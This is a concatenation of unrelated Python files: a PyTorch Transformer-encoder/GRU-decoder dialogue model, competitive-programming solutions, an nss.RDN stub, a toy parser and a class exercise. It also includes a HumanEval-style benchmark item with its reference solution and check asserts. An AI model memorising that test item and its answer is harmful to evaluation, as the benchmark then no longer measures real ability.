import torch.nn.functional as F
import torch.nn.init as init
import math
import random
import numpy as np
import pickle
import ipdb
import sys
import types
import transformers
from .layers import *
class Decoder(nn.Module):
'''
Add the multi-head attention for GRU
'''
def __init__(self, embed_size, hidden_size, output_size,
n_layers=2, dropout=0.5, nhead=8):
super(Decoder, self).__init__()
self.embed_size, self.hidden_size = embed_size, hidden_size
self.output_size = output_size
self.embed = nn.Embedding(output_size, embed_size)
self.multi_head_attention = nn.ModuleList([Attention(hidden_size) for _ in range(nhead)])
self.attention = Attention(hidden_size)
self.rnn = nn.GRU(hidden_size + embed_size,
hidden_size,
num_layers=n_layers,
dropout=(0 if n_layers == 1 else dropout))
self.out = nn.Linear(hidden_size, output_size)
self.ffn = nn.Linear(nhead*hidden_size, hidden_size)
self.init_weight()
def init_weight(self):
        # Xavier-normal initializer for the GRU weights
init.xavier_normal_(self.rnn.weight_hh_l0)
init.xavier_normal_(self.rnn.weight_ih_l0)
self.rnn.bias_ih_l0.data.fill_(0.0)
self.rnn.bias_hh_l0.data.fill_(0.0)
def forward(self, inpt, last_hidden, encoder_outputs):
# inpt: [batch]
# last_hidden: [2, batch, hidden_size]
embedded = self.embed(inpt).unsqueeze(0) # [1, batch, embed_size]
# attn_weights: [batch, 1, timestep of encoder_outputs]
key = last_hidden.sum(axis=0)
# calculate the attention
context_collector = []
for attention_head in self.multi_head_attention:
attn_weights = attention_head(key, encoder_outputs)
context = attn_weights.bmm(encoder_outputs.transpose(0, 1))
context = context.squeeze(1).transpose(0, 1) # [hidden, batch]
context_collector.append(context) # [N, hidden, batch]
        context = torch.stack(context_collector).view(-1, context.shape[-1]).transpose(0, 1)    # [batch, N*hidden]
# context = context.view(-1, context.shape[-1]).transpose(0, 1) # [batch, N*hidden]
context = torch.tanh(self.ffn(context)).unsqueeze(0) # [1, batch, hidden]
# context: [batch, 1, hidden_size]
# context = attn_weights.bmm(encoder_outputs.transpose(0, 1))
# context = context.transpose(0, 1)
rnn_input = torch.cat([embedded, context], 2)
output, hidden = self.rnn(rnn_input, last_hidden)
output = output.squeeze(0)
# context = context.squeeze(0)
# [batch, hidden * 2]
# output = self.out(torch.cat([output, context], 1))
output = self.out(output) # [batch, output_size]
output = F.log_softmax(output, dim=1)
# output: [batch, output_size]
# hidden: [2, batch, hidden_size]
# hidden = hidden.squeeze(0)
return output, hidden
class Transformer(nn.Module):
'''
Transformer encoder and GRU decoder
Multi-head attention for GRU
'''
def __init__(self, input_vocab_size, opt_vocab_size, d_model, nhead,
num_encoder_layers, dim_feedforward, position_embed_size=300,
utter_n_layer=2, dropout=0.3, sos=0, pad=0, teach_force=1):
super(Transformer, self).__init__()
self.d_model = d_model
self.hidden_size = d_model
self.embed_src = nn.Embedding(input_vocab_size, d_model)
# position maxlen is 5000
self.pos_enc = PositionEmbedding(d_model, dropout=dropout,
max_len=position_embed_size)
self.input_vocab_size = input_vocab_size
self.utter_n_layer = utter_n_layer
self.opt_vocab_size = opt_vocab_size
self.pad, self.sos = pad, sos
self.teach_force = teach_force
encoder_layer = nn.TransformerEncoderLayer(d_model=d_model, nhead=nhead,
dim_feedforward=dim_feedforward,
dropout=dropout, activation='gelu')
self.encoder = nn.TransformerEncoder(encoder_layer,
num_layers=num_encoder_layers)
self.decoder = Decoder(d_model, d_model, opt_vocab_size,
n_layers=utter_n_layer, dropout=dropout, nhead=nhead)
def generate_key_mask(self, x, lengths):
# x: [seq, batch]
# return: key mask [batch, seq]
seq_length = x.shape[0]
masks = []
for sentence_l in lengths:
masks.append([False for _ in range(sentence_l)] + [True for _ in range(seq_length - sentence_l)])
masks = torch.tensor(masks)
if torch.cuda.is_available():
masks = masks.cuda()
return masks
def forward(self, src, tgt, lengths):
# src: [seq, batch], tgt: [seq, batch], lengths: [batch]
batch_size, max_len = src.shape[1], tgt.shape[0]
src_key_padding_mask = self.generate_key_mask(src, lengths)
outputs = torch.zeros(max_len, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
# src: [seq, batch, d_model]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
# memory: [seq, batch, d_model]
memory = self.encoder(src, src_key_padding_mask=src_key_padding_mask)
# hidden: [2, batch, d_model]
hidden = torch.randn(self.utter_n_layer, batch_size, self.hidden_size)
if torch.cuda.is_available():
hidden = hidden.cuda()
output = tgt[0, :]
use_teacher = random.random() < self.teach_force
if use_teacher:
for t in range(1, max_len):
output, hidden = self.decoder(output, hidden, memory)
outputs[t] = output
output = tgt[t]
else:
for t in range(1, max_len):
output, hidden = self.decoder(output, hidden, memory)
outputs[t] = output
output = output.topk(1)[1].squeeze().detach()
# [max_len, batch, output_size]
return outputs
def predict(self, src, maxlen, lengths, loss=True):
with torch.no_grad():
batch_size = src.shape[1]
src_key_padding_mask = self.generate_key_mask(src, lengths)
outputs = torch.zeros(maxlen, batch_size)
floss = torch.zeros(maxlen, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
floss = floss.cuda()
# src: [seq, batch, d_model]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
# memory: [seq, batch, d_model]
memory = self.encoder(src, src_key_padding_mask=src_key_padding_mask)
# hidden: [2, batch, d_model]
hidden = torch.randn(self.utter_n_layer, batch_size, self.hidden_size)
if torch.cuda.is_available():
hidden = hidden.cuda()
output = torch.zeros(batch_size, dtype=torch.long).fill_(self.sos)
if torch.cuda.is_available():
output = output.cuda()
for t in range(1, maxlen):
output, hidden = self.decoder(output, hidden, memory)
floss[t] = output
# output = torch.max(output, 1)[1] # [1]
output = output.topk(1)[1].squeeze()
outputs[t] = output # output: [1, output_size]
if loss:
return outputs, floss
else:
return outputs
'''
class Transformer(nn.Module):
# Refer to:
# - https://github.com/andrewpeng02/transformer-translation
def __init__(self, inpt_vocab_size, opt_vocab_size, d_model, nhead,
num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, sos=0, pad=0):
super(Transformer, self).__init__()
self.d_model = d_model
self.embed_src = nn.Embedding(inpt_vocab_size, d_model)
self.embed_tgt = nn.Embedding(opt_vocab_size, d_model)
self.pos_enc = PositionEmbedding(d_model, dropout=dropout)
self.inpt_vocab_size = inpt_vocab_size
self.opt_vocab_size = opt_vocab_size
self.pad, self.sos = pad, sos
self.model = nn.Transformer(d_model, nhead,
num_encoder_layers,
num_decoder_layers,
dim_feedforward,
dropout)
self.fc = nn.Linear(d_model, opt_vocab_size)
self.init_weight()
def init_weight(self):
for p in self.parameters():
if p.dim() > 1:
init.xavier_normal_(p)
def forward(self, src, tgt,
src_key_padding_mask,
tgt_key_padding_mask,
memory_key_padding_mask):
# src, tgt: [seq, batch]
tgt_mask = gen_nopeek_mask(tgt.shape[0])
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
tgt = self.pos_enc(self.embed_tgt(tgt) * math.sqrt(self.d_model))
# encoder and decoder in one line
# input:
# src: [seq, batch]
# tgt: [seq, batch]
# src_key_padding_mask: [batch, seq]
# tgt_key_padding_mask: [batch, seq]
# memory_key_padding_mask: [batch, seq]
# output: [seq, batch, vocab]
output = self.model(src,
tgt,
tgt_mask=tgt_mask,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
# [seq, batch, vocab_size]
return F.log_softmax(self.fc(output), dim=-1)
def predict(self, src,
src_key_padding_mask,
memory_key_padding_mask,
maxlen):
# src: [seq, batch]
with torch.no_grad():
batch_size = src.shape[1]
outputs = torch.zeros(maxlen, batch_size)
floss = torch.zeros(maxlen, batch_size, self.opt_vocab_size)
if torch.cuda.is_available():
outputs = outputs.cuda()
floss = floss.cuda()
output = torch.zeros(batch_size, dtype=torch.long).fill_(self.sos)
if torch.cuda.is_available():
output = output.cuda()
output = [output]
src = self.pos_enc(self.embed_src(src) * math.sqrt(self.d_model))
for t in range(1, maxlen):
# tgt: [seq, batch, vocab_size]
# this part is slow druing inference
tgt_mask = gen_nopeek_mask(t)
soutput = torch.stack(output)
soutput = self.pos_enc(self.embed_tgt(soutput) * math.sqrt(self.d_model))
tgt = self.model(src,
soutput,
src_key_padding_mask=src_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask,
tgt_key_padding_mask=None,
tgt_mask=tgt_mask)
tgt = F.log_softmax(self.fc(tgt[-1]), dim=-1) # [batch, vocab_size]
floss[t] = tgt
tgt = tgt.topk(1)[1].squeeze() # [batch]
outputs[t] = tgt
output.append(tgt)
return outputs, floss
'''
'''
def bert_for_masked_lm_forward(self, input_ids, encoder_hidden, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None,
masked_lm_labels=None):
outputs = self.bert(input_ids,
attention_mask=attention_mask,
encoder_hidden=encoder_hidden, # NOTE: add this line
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
outputs = (prediction_scores,) + outputs[2:] # Add hidden states and attention if they are here
if masked_lm_labels is not None:
loss_fct = torch.nn.CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
outputs = (masked_lm_loss,) + outputs
return outputs # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)
def bert_model_forward(self, input_ids, encoder_hidden, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if head_mask is not None:
if head_mask.dim() == 1:
head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
head_mask = head_mask.expand(self.config.num_hidden_layers, -1, -1, -1, -1)
elif head_mask.dim() == 2:
head_mask = head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1) # We can specify head_mask for each layer
head_mask = head_mask.to(dtype=next(self.parameters()).dtype) # switch to fload if need + fp16 compatibility
else:
head_mask = [None] * self.config.num_hidden_layers
embedding_output = self.embeddings(input_ids, position_ids=position_ids, token_type_ids=token_type_ids)
encoder_outputs = self.encoder(embedding_output,
encoder_hidden, # NOTE: add this line
extended_attention_mask,
head_mask=head_mask)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output)
outputs = (sequence_output, pooled_output,) + encoder_outputs[1:] # add hidden_states and attentions if they are here
return outputs # sequence_output, pooled_output, (hidden_states), (attentions)
def bert_encoder_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
all_hidden_states = ()
all_attentions = ()
for i, layer_module in enumerate(self.layer):
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
# NOTE: add `encoder_hidden` to next line
layer_outputs = layer_module(hidden_states, encoder_hidden, attention_mask, head_mask[i])
hidden_states = layer_outputs[0]
if self.output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
# Add last layer
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if self.output_hidden_states:
outputs = outputs + (all_hidden_states,)
if self.output_attentions:
outputs = outputs + (all_attentions,)
return outputs # last-layer hidden state, (all hidden states), (all attentions)
def bert_layer_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
attention_outputs = self.attention(hidden_states, attention_mask, head_mask)
attention_output = attention_outputs[0]
# NOTE: add the 2 line blow
attention_outputs = self.cross_atten(attention_output, encoder_hidden, attention_mask, head_mask)
attention_output = attention_outputs[0]
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
outputs = (layer_output,) + attention_outputs[1:] # add attentions if we output them
return outputs
def cross_atten_block_forward(self, input_tensor, encoder_hidden, attention_mask=None, head_mask=None):
self_outputs = self.self(input_tensor, encoder_hidden, attention_mask, head_mask) # NOTE: add `encoder_hidden`
attention_output = self.output(self_outputs[0], input_tensor)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
def cross_bert_self_atten_forward(self, hidden_states, encoder_hidden, attention_mask=None, head_mask=None):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(encoder_hidden) # NOTE: change `hidden_states` to `encoder_hidden`
mixed_value_layer = self.value(encoder_hidden) # NOTE: change `hidden_states` to `encoder_hidden`
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# NOTE: Commented to remove attention mask (target to source)
# if attention_mask is not None:
# # Apply the attention mask is (precomputed for all layers in BertModel forward() function)
# attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
return outputs
def mask_bert_self_atten_forward(self, hidden_states, attention_mask=None, head_mask=None):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
# NOTE: Triangle mask (target to target)
target_len = attention_scores.size(-1)
mask = torch.tril(torch.ones(target_len, target_len))
mask = mask.masked_fill(mask == 0, float('-inf'))
mask = mask.masked_fill(mask == 1, 0.0)
mask = mask.to(next(self.parameters()).device)
mask = mask.unsqueeze(0).unsqueeze(0)
attention_scores = attention_scores + mask
# NOTE: Commented
# if attention_mask is not None:
# # Apply the attention mask is (precomputed for all layers in BertModel forward() function)
# attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
return outputs
class Decoder(nn.Module):
def __init__(self):
super().__init__()
config = transformers.BertConfig()
config.num_hidden_layers = 6
self.masked_lm = transformers.BertForMaskedLM(config)
for layer in self.masked_lm.bert.encoder.layer:
layer.cross_atten = transformers.modeling_bert.BertAttention(self.masked_lm.config)
layer.cross_atten.load_state_dict(layer.attention.state_dict())
def forward(self, input_ids, encoder_hidden):
self.bind_methods()
return self.masked_lm(input_ids, encoder_hidden)[0]
def bind_methods(self):
r"""Change forward method to add `encoder_hidden`.
Architecture:
(masked_lm): BertForMaskedLM [change forward]
(bert): BertModel [change forward]
(embeddings): BertEmbeddings
(encoder): BertEncoder [change forward]
(layer): ModuleList
(0): BertLayer [change forward]
(attention): BertAttention [change forward] [triangle mask]
(self): BertSelfAttention
(output): BertSelfOutput
(cross_atten): BertAttention [change forward] [add model]
(self): BertSelfAttention [change forward]
(output): BertSelfOutput
(intermediate): BertIntermediate
(output): BertOutput
(pooler): BertPooler
(cls): BertOnlyMLMHead
(predictions): BertLMPredictionHead
(transform): BertPredictionHeadTransform
(decoder): Linear
"""
self.masked_lm.forward = types.MethodType(bert_for_masked_lm_forward, self.masked_lm)
self.masked_lm.bert.forward = types.MethodType(bert_model_forward, self.masked_lm.bert)
self.masked_lm.bert.encoder.forward = types.MethodType(bert_encoder_forward, self.masked_lm.bert.encoder)
for layer in self.masked_lm.bert.encoder.layer:
layer.forward = types.MethodType(bert_layer_forward, layer)
layer.cross_atten.forward = types.MethodType(cross_atten_block_forward, layer.cross_atten)
layer.cross_atten.self.forward = types.MethodType(cross_bert_self_atten_forward, layer.cross_atten.self)
layer.attention.self.forward = types.MethodType(mask_bert_self_atten_forward, layer.attention.self)
class Transformer(nn.Module):
def __init__(self):
super(Transformer, self).__init__()
self.tokenizer = transformers.BertTokenizer.from_pretrained('config/vocab_en.txt')
print(f'[!] transformer model, vocab size: {len(self.tokenizer)}')
self.vocab_size = len(self.tokenizer)
config = transformers.BertConfig()
config.num_hidden_layers = 6
self.encoder = transformers.BertModel(config)
self.decoder = Decoder()
self.teach_force = 1
config = self.encoder.config
self.decoder.masked_lm.cls.predictions.decoder = \
nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.decoder.masked_lm.cls.predictions.decoder.weight.data.copy_(
self.encoder.embeddings.word_embeddings.weight)
self.decoder.masked_lm.cls.predictions.bias = \
torch.nn.Parameter(torch.zeros(config.vocab_size))
def get_token_type_ids(self, x):
token_type_ids = torch.zeros_like(x)
for i in range(x.size(0)):
sep_index = (x[i] == self.tokenizer.sep_token_id).nonzero()
sep_index = sep_index.squeeze(-1).tolist()
sep_index.append(len(x[0]))
sep_index.append(len(x[i]) - 1)
for j in range(0, len(sep_index) // 2 * 2, 2):
start, end = sep_index[j], sep_index[j + 1]
token_type_ids[i, start+1:end+1] = 1
return token_type_ids
def forward(self, x, y):
# x, y: [batch, seq_len]
token_type_ids = self.get_token_type_ids(x)
encoder_hidden = self.encoder(x, token_type_ids=token_type_ids)[0]
# logits: [batch, seq, vocab]
logits = self.decoder(y[:, :-1], encoder_hidden)
return logits
def predict(self, x, max_len):
# x: [batch, seq]
with torch.no_grad():
token_type_ids = self.get_token_type_ids(x)
encoder_hidden = self.encoder(x)[0]
# token_ids: [batch, maxlen]
token_ids = torch.empty(x.size(0), max_len, dtype=torch.int64)
token_ids[:, 0].fill_(self.tokenizer.cls_token_id) # begin
token_ids[:, 1:].fill_(self.tokenizer.pad_token_id) # <pad>
token_ids = token_ids.to(next(self.parameters()).device)
for i in range(max_len - 1):
with torch.no_grad():
logits = self.decoder(token_ids, encoder_hidden)
new_token_ids = logits[:, i].argmax(dim=-1)
token_ids[:, i + 1] = new_token_ids
return token_ids
'''
| [
"[email protected]"
] | |
09275b427690ef44e7430628700f07f44cb8824f | 627b050148e767be12cfc7dfa81b1c6368cf3104 | /LeetCode/Apr20Challenge/Week4/day28_first_unique_number.py | dbac91abe928bd0387b8a926467a0d6759e87d98 | [] | no_license | imn00133/algorithm | 6ce5d10491bde853eb9e4d6a69bde3124723875c | 40d7bbe6e3cfe932122c32a9f730f951e948ef2d | refs/heads/master | 2022-08-13T20:26:06.200622 | 2022-07-31T08:54:26 | 2022-07-31T08:54:26 | 231,281,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py | #
# Solved Date: 20.04.28.
import collections
class FirstUnique:
def __init__(self, nums):
self.unique = None
self.next_unique_queue = collections.deque()
self.manage_unique = collections.defaultdict(int)
for number in nums:
self.manage_unique[number] += 1
if self.manage_unique[number] == 1:
self.next_unique_queue.append(number)
self.find_next_unique()
def show_first_unique(self) -> int:
if self.unique is not None:
return self.unique
else:
return -1
def add(self, value) -> None:
self.manage_unique[value] += 1
if self.manage_unique[value] == 1:
self.next_unique_queue.append(value)
if value == self.show_first_unique() or self.show_first_unique() == -1:
self.find_next_unique()
def find_next_unique(self):
while self.next_unique_queue:
number = self.next_unique_queue.popleft()
if self.manage_unique[number] == 1:
self.unique = number
break
else:
self.unique = None
def test():
queue = FirstUnique([2, 3, 5])
print(queue.show_first_unique())
queue.add(5)
print(queue.show_first_unique())
queue.add(2)
print(queue.show_first_unique())
queue.add(3)
print(queue.show_first_unique())
print()
queue = FirstUnique([7, 7, 7])
print(queue.show_first_unique())
queue.add(7)
queue.add(3)
queue.add(3)
queue.add(7)
queue.add(17)
print(queue.show_first_unique())
print()
queue = FirstUnique([809])
print(queue.show_first_unique())
queue.add(809)
print(queue.show_first_unique())
if __name__ == '__main__':
test()
| [
"[email protected]"
] | |
a669bc69cb66d9ef0348342ab4523d913845ef3c | ca3a49676cdf1016b2d729f0432b451d35b7a281 | /human_eval/51b1be3f-d417-418d-9236-bf203e68cd76.py | 68a5863b1201739cd1b33a0edc4579baab2e15f8 | [
"MIT"
] | permissive | SquareandCompass/code-align-evals-data | 3bb71b605316f56bb27466f23706a329f3fb4938 | 97446d992c3785d6605f1500b2c9b95d042e7b9c | refs/heads/main | 2023-06-19T12:47:56.277363 | 2021-07-21T00:22:56 | 2021-07-21T00:22:56 | 640,147,842 | 0 | 1 | null | 2023-05-13T06:22:30 | 2023-05-13T06:22:29 | null | UTF-8 | Python | false | false | 1,269 | py | ENTRY_POINT = 'check_if_last_char_is_a_letter'
#[PROMPT]
def check_if_last_char_is_a_letter(txt):
'''
Create a function that returns True if the last character
of a given string is an alphabetical character and is not
a part of a word, and False otherwise.
Note: "word" is a group of characters separated by space.
Examples:
check_if_last_char_is_a_letter("apple pie") ➞ False
check_if_last_char_is_a_letter("apple pi e") ➞ True
check_if_last_char_is_a_letter("apple pi e ") ➞ False
check_if_last_char_is_a_letter("") ➞ False
'''
#[SOLUTION]
check = txt.split(' ')[-1]
return True if len(check) == 1 and (97 <= ord(check.lower()) <= 122) else False
#[CHECK]
def check(candidate):
# Check some simple cases
assert candidate("apple") == False
assert candidate("apple pi e") == True
assert candidate("eeeee") == False
assert candidate("A") == True
assert candidate("Pumpkin pie ") == False
assert candidate("Pumpkin pie 1") == False
assert candidate("") == False
assert candidate("eeeee e ") == False
assert candidate("apple pie") == False
assert candidate("apple pi e ") == False
# Check some edge cases that are easy to work out by hand.
assert True
| [
"[email protected]"
] | |
a1e485a39c453c99a40f6f2d40cad085fe060fb2 | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/nss/nss/RDN.py | 0e53aeab1e6b2f125e445f912c8e9778bbce5a23 | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # encoding: utf-8
# module nss.nss
# from /usr/lib64/python2.6/site-packages/nss/nss.so
# by generator 1.136
""" This module implements the NSS functions """
# no imports
from object import object
class RDN(object):
"""
An object representing an X501 Relative Distinguished Name (e.g. RDN).
RDN objects contain an ordered list of `AVA` objects.
Examples::
RDN()
RDN(nss.AVA('cn', 'www.redhat.com'))
RDN([ava0, ava1])
The RDN object constructor may be invoked with zero or more
`AVA` objects, or you may optionally pass a list or tuple of `AVA`
objects.
RDN objects contain an ordered list of `AVA` objects. The
RDN object has both sequence and mapping behaviors with respect to
the AVA's they contain. Thus you can index an AVA by position, by
name, or by SecItem (if it's an OID). You can iterate over the list,
get it's length or take a slice.
If you index by string the string may be either a canonical name for
the AVA type (e.g. 'cn') or the dotted-decimal notation for the OID
(e.g. 2.5.4.3). There may be multiple AVA's in a RDN whose type matches
(e.g. OU=engineering+OU=boston). It is not common to have more than
one AVA in a RDN with the same type. However because of the possiblity
of being multi-valued when indexing by type a list is always returned
containing the matching AVA's. Thus::
rdn = nss.RDN(nss.AVA('OU', 'engineering'))
rdn['ou']
returns [AVA('OU=engineering')
rdn = nss.RDN(nss.AVA('OU', 'engineering'), nss.AVA('OU', 'boston'))
rdn['ou']
returns [AVA('OU=boston'), AVA('OU=engineering')]
Examples::
rdn = nss.RDN(nss.AVA('cn', 'www.redhat.com'))
str(rdn)
returns 'CN=www.redhat.com'
rdn[0]
returns an `AVA` object with the value C=US
rdn['cn']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
rdn['2.5.4.3']
returns a list comprised of an `AVA` object with the value CN=www.redhat.com
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
rdn.has_key('cn')
returns True because the RDN has a common name RDN
rdn.has_key('2.5.4.3')
returns True because the RDN has a common name AVA
because 2.5.4.3 is the dotted-decimal OID for common name (i.e. cn)
len(rdn)
returns 1 because there is one `AVA` object in it
list(rdn)
returns a list of each `AVA` object in it
"""
def has_key(self, arg): # real signature unknown; restored from __doc__
"""
has_key(arg) -> bool
:Parameters:
arg : string or integer
canonical name (e.g. 'cn') or oid dotted-decimal or
SEC_OID_* enumeration constant
return True if RDN has an AVA whose oid can be identified by arg.
"""
return False
def __cmp__(self, y): # real signature unknown; restored from __doc__
""" x.__cmp__(y) <==> cmp(x,y) """
pass
def __getitem__(self, y): # real signature unknown; restored from __doc__
""" x.__getitem__(y) <==> x[y] """
pass
def __init__(self): # real signature unknown; restored from __doc__
pass
def __len__(self): # real signature unknown; restored from __doc__
""" x.__len__() <==> len(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
| [
"[email protected]"
] | |
67a8e024e53d7041f7109406e394418a30cabb10 | 6bd9d7679011042f46104d97080786423ae58879 | /1690/c/c.py | 05a66b00321f18a9b1c0841c33b880eda782958a | [
"CC-BY-4.0"
] | permissive | lucifer1004/codeforces | 20b77bdd707a1e04bc5b1230f5feb4452d5f4c78 | d1fe331d98d6d379723939db287a499dff24c519 | refs/heads/master | 2023-04-28T16:00:37.673566 | 2023-04-17T03:40:27 | 2023-04-17T03:40:27 | 212,258,015 | 3 | 1 | null | 2020-10-27T06:54:02 | 2019-10-02T04:53:36 | C++ | UTF-8 | Python | false | false | 471 | py | from sys import stdin
def input(): return stdin.readline().strip()
def read_int():
return int(input())
def read_ints():
return map(int, input().split())
t = read_int()
for case_num in range(t):
n = read_int()
s = list(read_ints())
f = list(read_ints())
d = []
for i in range(n):
if i == 0 or s[i] >= f[i - 1]:
d.append(f[i] - s[i])
else:
d.append(f[i] - f[i - 1])
print(' '.join(map(str, d)))
| [
"[email protected]"
] | |
cb9ad7f3950ff6065752bffa32432288fbc57bc1 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/ti_.py | 41e20b589684d5f3162010636a3b247638095db8 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'tI_':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
b1db52e476e7f1ade39cda5d0191f6c042142711 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/classvs_20200630154634.py | 8a7e8665bf8b3e3c22a42c56688dd4c01f2f0c85 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 638 | py | class Person:
age = 0
# this is a constructor
def __init__(self,initialAge):
if initialAge > 0:
self.age = initialAge
else:
self.age = 0
print("Age is not valid, setting age to 0.. ")
def yearPasses(self):
self.age = self.age +1
return self.age
def amOld(self):
if self.age < 13:
print("You are young..")
        elif self.age >= 13 and self.age < 18:
print("You are a teenager..")
else:
print("You are old..")
# this is an object
person = Person(10)
person.yearPasses()
person.amOld()
| [
"[email protected]"
] | |
